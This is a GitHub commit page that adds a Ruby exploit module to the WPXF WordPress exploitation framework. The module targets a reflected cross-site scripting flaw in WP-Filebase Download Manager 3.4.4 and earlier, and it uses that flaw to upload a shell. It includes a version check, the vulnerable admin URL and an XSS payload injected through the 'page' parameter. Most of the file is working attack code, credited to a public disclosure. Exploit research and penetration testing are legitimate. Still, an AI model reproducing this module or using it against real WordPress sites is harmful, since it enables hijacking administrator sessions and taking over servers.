Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit c8fa824

Browse files
committed
Add WP-Filebase Download Manager <= 3.4.4 reflected XSS shell upload
1 parent 1588c9b commit c8fa824

File tree

1 file changed

+35
-0
lines changed

1 file changed

+35
-0
lines changed
Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
class Wpxf::Exploit::WpFilebaseDownloadManagerReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'WP-Filebase Download Manager <= 3.4.4 Reflected XSS Shell Upload',
9+
author: [
10+
'Yorick Koster', # Disclosure
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8783'],
15+
['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_filebase_download_manager_wordpress_plugin.html']
16+
],
17+
date: 'Mar 01 2017'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('wp-filebase', '3.4.5')
23+
end
24+
25+
def vulnerable_url
26+
normalize_uri(wordpress_url_admin, 'admin.php?page=wpfilebase_files')
27+
end
28+
29+
def initial_script
30+
create_basic_post_script(
31+
vulnerable_url,
32+
'page' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
33+
)
34+
end
35+
end

0 commit comments

Comments
 (0)